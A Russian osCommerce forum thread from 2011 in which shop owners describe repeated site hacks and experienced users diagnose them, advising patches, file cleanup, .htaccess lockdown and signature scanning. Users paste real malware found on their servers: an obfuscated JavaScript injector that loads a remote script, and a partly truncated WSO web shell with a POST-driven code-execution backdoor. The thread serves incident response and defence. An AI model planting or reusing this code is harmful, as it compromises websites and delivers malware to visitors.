Русский OsCommerce

Здравствуйте, гость ( Вход | Регистрация )

 Правила форума Правила форума
 
Ответить в данную темуНачать новую тему
> Проблема в движке? Характерные взломы
kaco
сообщение 20.3.2011, 7:36
Сообщение #1


Новичек
Иконка группы

Группа: Members
Сообщений: 10
Регистрация: 17.8.2007
Пользователь №: 22 742



На форуме про аналогичные взломы написано много, однако ничего пока не помогло... Прошу помощи! Раньше с таким не приходилось сталкиваться.
Имеется сайт на oscommerce (Vam), за последнюю неделю взламывался 4 раза - добавка скрипта во все индекс и все .js файлы.
(на этом же фтп-аккаунте лежит еще 5 сайтов на других движках - не тронуты)
Зато одновременно (с разбежкой в пару часов) ломают еще один мой сайт на oscommerce, который лежит у другого хостера и никак не связан с первым (разве что принадлежит той же фирме). Взломан тем же способом.
Принятые меры - смена фтп паролей, нехранение их в фтп-клиенте, чистка компьютера, чистка всех зараженных файлов,
и в конце концов установка прав 444 на все взламываемые файлы, после последней меры файлы php с 444 не тронуты, .js файлы с 444 подменены на новые зараженные а старые версии остались в виде *.js_bck, заражены все корневые php и html файлы, имевшие права 644

Заранее спасибо!
Перейти в начало страницы
 
+Цитировать сообщение
VaM
сообщение 20.3.2011, 7:56
Сообщение #2


Модератор
Иконка группы

Группа: Members
Сообщений: 14 847
Регистрация: 12.5.2002
Из: Ставрополь
Пользователь №: 25
Имя, Фамилия: Александр Меновщиков



А какая версия сборки?!

Вы проверяли папки /images , /admin/images/

Если там есть php файлы - удалите.

Проверьте комп на вирусы.
Перейти в начало страницы
 
+Цитировать сообщение
kaco
сообщение 20.3.2011, 8:24
Сообщение #3


Новичек
Иконка группы

Группа: Members
Сообщений: 10
Регистрация: 17.8.2007
Пользователь №: 22 742



Сборка покупалась в конце 2008 года, с тех пор не обновлялась.

В папках images ничего лишнего нет.
Антивирус на компе ничего не ловит...

Интересно, что прежние взломы заражали только индексы и js файлы, а сегодня ночью, после неудачной попытки изменить индексы (444) - влезли в файлы шаблона, sts.php, footer.php и тд.

Хочу попробовать защититься ftpaccess-ом,
Перейти в начало страницы
 
+Цитировать сообщение
VaM
сообщение 20.3.2011, 9:02
Сообщение #4


Модератор
Иконка группы

Группа: Members
Сообщений: 14 847
Регистрация: 12.5.2002
Из: Ставрополь
Пользователь №: 25
Имя, Фамилия: Александр Меновщиков



Если старая версия, то есть смысл удалить файл /affiliate_show_banner.php
Перейти в начало страницы
 
+Цитировать сообщение
a_berezin
сообщение 20.3.2011, 13:49
Сообщение #5


Profi
Иконка группы

Группа: Members
Сообщений: 9 694
Регистрация: 7.5.2004
Из: Санкт-Петербург
Пользователь №: 1 538
Имя, Фамилия: Андрей Березин
Откуда:Россия, Санкт-Петербург



Цитата(kaco @ 20.3.2011, 9:24) *
Интересно, что прежние взломы заражали только индексы и js файлы, а сегодня ночью, после неудачной попытки изменить индексы (444) - влезли в файлы шаблона, sts.php, footer.php и тд.

Хорошо бы посмотреть логи доступа и логи ошибок. Пришлите на email.
Перейти в начало страницы
 
+Цитировать сообщение
kaco
сообщение 20.3.2011, 18:07
Сообщение #6


Новичек
Иконка группы

Группа: Members
Сообщений: 10
Регистрация: 17.8.2007
Пользователь №: 22 742



Цитата(VaM @ 20.3.2011, 10:02) *
Если старая версия, то есть смысл удалить файл /affiliate_show_banner.php


Попробую, спасибо
Перейти в начало страницы
 
+Цитировать сообщение
Drum
сообщение 21.3.2011, 18:58
Сообщение #7


Участник обсуждения
Иконка группы

Группа: Members
Сообщений: 82
Регистрация: 4.9.2004
Пользователь №: 2 277



У меня абсолютно такая же проблема, тоже старая сборка, каждый день ломают, сейчас выложу логи и зараженные файлы
Перейти в начало страницы
 
+Цитировать сообщение
a_berezin
сообщение 21.3.2011, 22:39
Сообщение #8


Profi
Иконка группы

Группа: Members
Сообщений: 9 694
Регистрация: 7.5.2004
Из: Санкт-Петербург
Пользователь №: 1 538
Имя, Фамилия: Андрей Березин
Откуда:Россия, Санкт-Петербург



Не надо ничего выкладывать - обновляйте скрипт
Перейти в начало страницы
 
+Цитировать сообщение
Drum
сообщение 21.3.2011, 23:28
Сообщение #9


Участник обсуждения
Иконка группы

Группа: Members
Сообщений: 82
Регистрация: 4.9.2004
Пользователь №: 2 277



Да как обновлять, чем? Патчи ставились не регулярно, а потом и вовсе перестал их ставить, глупо конечно, но тогда как то не думал, потом магазин разросся, кое-что правилось, уже не помню что, я бы рад на новый магазин перейти, только боюсь не по силам мне перенести все на новый магазин.

Сделал все что советовали здесь: http://oscomm.biz/index.php?showtopic=1850...show_banner.php
ждем...
Перейти в начало страницы
 
+Цитировать сообщение
a_berezin
сообщение 22.3.2011, 6:18
Сообщение #10


Profi
Иконка группы

Группа: Members
Сообщений: 9 694
Регистрация: 7.5.2004
Из: Санкт-Петербург
Пользователь №: 1 538
Имя, Фамилия: Андрей Березин
Откуда:Россия, Санкт-Петербург



Как это не парадоксально, но опыт показал что ArtRich прав - практически все взломы связаны с этой дырой. Что было неожиданным для меня - как можно столько лет жить с такой дырой? Пока не клюнет?
Цитата(a_berezin @ 15.3.2011, 10:47) *
Официальный фикс выглядит так (http://www.oscommerce.info/confluence/disp...+PHP_SELF+Value):
Код
$PHP_SELF = (isset($HTTP_SERVER_VARS['PHP_SELF']) ? $HTTP_SERVER_VARS['PHP_SELF'] : $HTTP_SERVER_VARS['SCRIPT_NAME']);

заменяем на
Код
$PHP_SELF = (((strlen(ini_get('cgi.fix_pathinfo')) > 0) && ((bool)ini_get('cgi.fix_pathinfo') == false)) || !isset($HTTP_SERVER_VARS['SCRIPT_NAME'])) ? basename($HTTP_SERVER_VARS['PHP_SELF']) : basename($HTTP_SERVER_VARS['SCRIPT_NAME']);
Перейти в начало страницы
 
+Цитировать сообщение
gualeks
сообщение 24.3.2011, 14:55
Сообщение #11


Участник обсуждения
Иконка группы

Группа: Members
Сообщений: 141
Регистрация: 12.7.2004
Пользователь №: 1 935



Цитата(a_berezin @ 22.3.2011, 6:18) *
Как это не парадоксально, но опыт показал что ArtRich прав - практически все взломы связаны с этой дырой. Что было неожиданным для меня - как можно столько лет жить с такой дырой? Пока не клюнет?


Я этот момент исправил, и после этого все равно сломали. Загружал картинку для товара, в этот момент пошла загрузка с какого-то незнакомого сайта, и сайт сломался.
Перейти в начало страницы
 
+Цитировать сообщение
a_berezin
сообщение 24.3.2011, 15:46
Сообщение #12


Profi
Иконка группы

Группа: Members
Сообщений: 9 694
Регистрация: 7.5.2004
Из: Санкт-Петербург
Пользователь №: 1 538
Имя, Фамилия: Андрей Березин
Откуда:Россия, Санкт-Петербург



Цитата(gualeks @ 24.3.2011, 15:55) *
Я этот момент исправил

Какой именно "этот момент"?

Цитата(gualeks @ 24.3.2011, 15:55) *
и после этого все равно сломали

Неизвестно какой именно момент исправлен, вполне допускаю что вовсе не тот, который нужно было исправлять. Но даже если исправлено то, что нужно, а сайт не вычищен от шпиЁнского по, не закрыты поддиректории, то всё это бесполезно. Просканируй сайт - поищи в файлах такие строки:
opendivclr
createCSS
eval(base64_decode(
fopen('imlog.php'
2analytics.ws/in.cgi

и самое вкусное - WebShell WSO:
$auth_pass
$default_action
preg_replace("/.*/e","\x65\x76\x61\x6C
Опознать WSO не так просто, т.к. и эти строки могут быть закодированы. Нужно смотреть index.php, password_forgotten.php. Обычно WSO записывают в самое начало файла. Хотя могут и в конец и вообще в любое место.

Список далеко не полный. Вирусы можно поискать антивирусом. Но вирусы на сайт вешают только совсем юные и глупые кул-хацкеры. Бывает что WebShell установлен, а сайт не заражён, т.е. нет на нём вирусных js/iframe. И о том, что ваш сайт мягко говоря имеют как хотят Вы не узнаете никогда, если не будете сверять содержимое сайта (файлы) с образцом. Потому что цель нормального (если это определение вообще может быть применено к этим преступникам) - заработать денег. А заработать денег на чужом сайте можно только тихонечко, не заметно для владельца сайта.
Кстати, у этого утверждения есть один неожиданный вывод - если на сайте нет вирусов и вы не мониторите его, то будьте не уверены в его целостности. Вполне возможно что вас имеют, а вы не в курсе. Поэтому - предохраняйтесь!

Нужно делать так:
1. Закрыть весь сайт в htaccess, разрешив доступ только со своего ip.
2. Закрыть все известные дыры.
3. Закрыть все директории через htaccess
4. Вычистить все скрипты, js и html. Удалить php файлы из субдиректорий /images/.
5. Запустить мониторинг целостности сайта.
6. Сделать копию файлов.
7. Открыть доступ к сайту.
Перейти в начало страницы
 
+Цитировать сообщение
Drum
сообщение 26.3.2011, 10:39
Сообщение #13


Участник обсуждения
Иконка группы

Группа: Members
Сообщений: 82
Регистрация: 4.9.2004
Пользователь №: 2 277



У меня больше взломов не наблюдается.
У меня сложилось впечатление что сайт взломан не вручную а программой-пауком, все крайне топорно, аж код в тексте на всех страницах в тексте виден. Атаки были ежедневно примерно в одно и то же время с 3 до 5 дня.
Даты изменения файлов были реальные и было видно какие файлы менялись. Скрипт перенаправлял на голландский сайт, там ожидал троян.
Добавлялись в *.js такие строки:

CODE
<script language="JavaScript">if (typeof color_arr == 'undefined') {
var color_arr = true;
window.onload=function(){
var opendivclr = '';
var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74',
'#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281',
'#724c31', '#778383', '#7f493e', '#3e7277', '#70737e', '#7d3d7d', '#7b3e7e',
'#897883', '#847374', '#3e7270', '#83707b', '#7e763e', '#79823e', '#314d4b',
'#3e8272', '#81787f', '#834d00');
for (j=0;j<div_colors.length;j++) {
var c_rgb = div_colors[j];
for (i=1;i<7;i++) {
var c_clr = c_rgb.substr(i++,2);
if (c_clr!='00') opendivclr += String.fromCharCode(parseInt(c_clr,16)-15);
}
}
if(!document.getElementById || !document.createElement){
document.write(opendivclr);
} else {
var new_cstyle=document.createElement('script');
new_cstyle.type='text/javascript';
new_cstyle.src=opendivclr.substr(36,36);
document.getElementsByTagName('head')[0].appendChild(new_cstyle);
}
}
}</script>




В корне появился файл 1.html
с текстом:

CODE
<html>
<head>
<title>x</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
</head>

<body bgcolor="#FFFFFF" text="#000000">

<font size="4">____________________________________________ENTER:<br>
</font>

<script type="text/javascript"><!--
google_ad_client = "pub-8702495858968695";
google_ad_width = 728;
google_ad_height = 15;
google_ad_format = "728x15_0ads_al";
google_ad_channel = "";
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>

</body>
</html>




Если загрузить канал торрентом, то при загрузке страницы в строке состояния было видно что идет обращение к чужому сайту, причем ни мозилла ни опера никак не риагировали, видимо есть внутренняя защита, если открывать старым IE то сразу начинал ругаться антивирь.



Я не стал заморачиваться, снес все и залил бэкап годовалой давности (преварительно исправив aplication_top и поправил htaccess).
Перейти в начало страницы
 
+Цитировать сообщение
a_berezin
сообщение 26.3.2011, 11:38
Сообщение #14


Profi
Иконка группы

Группа: Members
Сообщений: 9 694
Регистрация: 7.5.2004
Из: Санкт-Петербург
Пользователь №: 1 538
Имя, Фамилия: Андрей Березин
Откуда:Россия, Санкт-Петербург



Цитата(Drum @ 26.3.2011, 11:39) *
У меня больше взломов не наблюдается.

Вам повезло - не был внедрён ВЕБ-Шелл.

Цитата(Drum @ 26.3.2011, 11:39) *
У меня сложилось впечатление что сайт взломан не вручную а программой-пауком

Конечно и роботы бегают по сети ищут дырявые сайты и заражают вирусами. Я у себя веду логи атак и очень хорошо видно как время от времени по сайту пробегают боты пробуя разные известные атаки, совершенно неуместные для данного сайта, например атаки на joomla, phpMyAdmin и т.д..

Цитата(Drum @ 26.3.2011, 11:39) *
У меня сложилось впечатление что сайт взломан не вручную а программой-пауком, все крайне топорно, аж код в тексте на всех страницах в тексте виден.

А куда денешь js-код? Его сложно спрятать - всё равно будет видно. Даже если сожмёшь и обсфукаешь smile.gif Другое дело, что он действительно уж очень тупо внедряется, что, прочем, облегчает задачу его обнаружения smile.gif

Робот - это один из инструментов. Его задача - обнаружить сайт с известными дырами. Что делать дальше - решает тот, кто запускает этот робот. Ваш случай с opendivclr - это один. На одном сайте я видел файлы, которые были одновременно заражены несколькими вирусами! Т.е. его атаковали несколько ботов. Заражение такими вирусами - самый простой случай, потому как обнаруживается быстро. Самое сложное - скрытое, латентное заражение. Никто ничего не видит. ВЕБ-Шелл обычно активизируется при задании ключевого параметра в url. И используется он не для глупого и бессмысленного дефейса и/или заражения, а для зарабатывания денег - размещение саповских и других ссылок, прокрутка рекламы (как в Вашем случае с 1.html) и т.п. И вот этот случай уже более сложный.
Перейти в начало страницы
 
+Цитировать сообщение
kaco
сообщение 27.3.2011, 17:23
Сообщение #15


Новичек
Иконка группы

Группа: Members
Сообщений: 10
Регистрация: 17.8.2007
Пользователь №: 22 742



Цитата
Добавлялись в *.js такие строки:

CODE
<script language="JavaScript">if (typeof color_arr == 'undefined') {
var color_arr = true;
window.onload=function(){
var opendivclr = '';
var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74',
'#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281',
'#724c31', '#778383', '#7f493e', '#3e7277', '#70737e', '#7d3d7d', '#7b3e7e',
'#897883', '#847374', '#3e7270', '#83707b', '#7e763e', '#79823e', '#314d4b',
'#3e8272', '#81787f', '#834d00');
for (j=0;j<div_colors.length;j++) {
var c_rgb = div_colors[j];
for (i=1;i<7;i++) {
var c_clr = c_rgb.substr(i++,2);
if (c_clr!='00') opendivclr += String.fromCharCode(parseInt(c_clr,16)-15);
}
}
if(!document.getElementById || !document.createElement){
document.write(opendivclr);
} else {
var new_cstyle=document.createElement('script');
new_cstyle.type='text/javascript';
new_cstyle.src=opendivclr.substr(36,36);
document.getElementsByTagName('head')[0].appendChild(new_cstyle);
}
}
}</script>


Надо же, у меня та же ерунда была. Взломы прекратились после тщательной чистки сайта.
У некоторых зараженных файлов дата изменения была сдвинута в прошлое, поэтому не сразу удалось всё почистить...

Особое спасибо a_berezin за дельные советы!
Перейти в начало страницы
 
+Цитировать сообщение
a_berezin
сообщение 28.3.2011, 0:35
Сообщение #16


Profi
Иконка группы

Группа: Members
Сообщений: 9 694
Регистрация: 7.5.2004
Из: Санкт-Петербург
Пользователь №: 1 538
Имя, Фамилия: Андрей Березин
Откуда:Россия, Санкт-Петербург



Цитата(kaco @ 27.3.2011, 19:23) *
У некоторых зараженных файлов дата изменения была сдвинута в прошлое, поэтому не сразу удалось всё почистить...

О! Это как раз то, о чём я предупреждал - нельзя ориентироваться на дату изменения файла! Конечно новые нужно проверять, но это не значит, что "старые" не были совсем недавно изменены!
Перейти в начало страницы
 
+Цитировать сообщение
Drum
сообщение 28.3.2011, 13:28
Сообщение #17


Участник обсуждения
Иконка группы

Группа: Members
Сообщений: 82
Регистрация: 4.9.2004
Пользователь №: 2 277



Я не совсем понял по поводу шелла, снос всех файлов и заливка из бэкапа могут не помочь?

Еще такой файлик нашел: gychok.php был в images/banners

Код
<?php if(isset($_GET["86d366d4fb0394f562fadc1674268b"])){$auth_pass="";$color="#df5";$default_action='FilesMan';$default_use_ajax=true;$default_charset='Windows-1251';preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4CkREqy43S738N1vbufp7FIEA
RJkARBAHT7xRVnNIlui4XO6d7Jx72TC/PN2dmHzjl8dbZf7x2dmd9KJXbHCtPQCbYHzjgKWYtZQWDdFo3Xvj/wHKPMjFNvGkzwx/vTo1d+hL9cq2MF9tC9dgL8/GKNe84N/jqxRl0PEktN5vaL ............ много всего...............


Oz70Hc58T0t3hQDOX2hQeV7fCeoLNq9ulb+iR9awo80ZtZXK2r56dUYJbQgDn2wbjvy2c5cgh8gAi9Lb
aFz7lC13SwzDxAYT72vwA='\x29\x29\x29\x3B",".");} ?><?php $w=showimg;if(isset($_GET[$w])){echo $w.chr(98).$w;$w=w;if(isset($_POST[$w])){$s=base64_decode(str_replace(chr(32),chr(43),$_POST[$w]));create_function(substr(0,0,0),chr(125).$s.chr(47).chr(47));}exit;}?>
Перейти в начало страницы
 
+Цитировать сообщение
a_berezin
сообщение 28.3.2011, 14:57
Сообщение #18


Profi
Иконка группы

Группа: Members
Сообщений: 9 694
Регистрация: 7.5.2004
Из: Санкт-Петербург
Пользователь №: 1 538
Имя, Фамилия: Андрей Березин
Откуда:Россия, Санкт-Петербург



Цитата(Drum @ 28.3.2011, 15:28) *
Я не совсем понял по поводу шелла, снос всех файлов и заливка из бэкапа могут не помочь?

Снос ВСЕХ файлов и заливка новых помочь могут. Если перед заливкой бекапа будут установлены патчи, прописаны htaccess.
Цитата(Drum @ 28.3.2011, 15:28) *
Еще такой файлик нашел: gychok.php был в images/banners

Код
<?php if(isset($_GET["86d366d4fb0394f562fadc1674268b"])){$auth_pass="";$color="#df5";$default_action='FilesMan';$default_use_ajax=true;$default_charset='Windows-1251';preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4CkREqy43S738N1vbufp7FIEA
RJkARBAHT7xRVnNIlui4XO6d7Jx72TC/PN2dmHzjl8dbZf7x2dmd9KJXbHCtPQCbYHzjgKWYtZQWDdFo3Xvj/wHKPMjFNvGkzwx/vTo1d+hL9cq2MF9tC9dgL8/GKNe84N/jqxRl0PEktN5vaL ............ много всего...............
Oz70Hc58T0t3hQDOX2hQeV7fCeoLNq9ulb+iR9awo80ZtZXK2r56dUYJbQgDn2wbjvy2c5cgh8gAi9Lb
aFz7lC13SwzDxAYT72vwA='\x29\x29\x29\x3B",".");} ?><?php $w=showimg;if(isset($_GET[$w])){echo $w.chr(98).$w;$w=w;if(isset($_POST[$w])){$s=base64_decode(str_replace(chr(32),chr(43),$_POST[$w]));create_function(substr(0,0,0),chr(125).$s.chr(47).chr(47));}exit;}?>

Это и есть Web Shell. И что-то ещё.
Перейти в начало страницы
 
+Цитировать сообщение
Алла
сообщение 26.7.2011, 16:50
Сообщение #19


Новичек
Иконка группы

Группа: Members
Сообщений: 15
Регистрация: 13.7.2011
Пользователь №: 49 184
Имя, Фамилия: Алла Николаевна
Откуда:Одесса



у меня такой вот файл...удалить его -будет достаточно, или ещё где- то искать гадости такие?
Перейти в начало страницы
 
+Цитировать сообщение

Ответить в данную темуНачать новую тему
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0

 



RSS Текстовая версия Сейчас: 20.11.2019, 20:26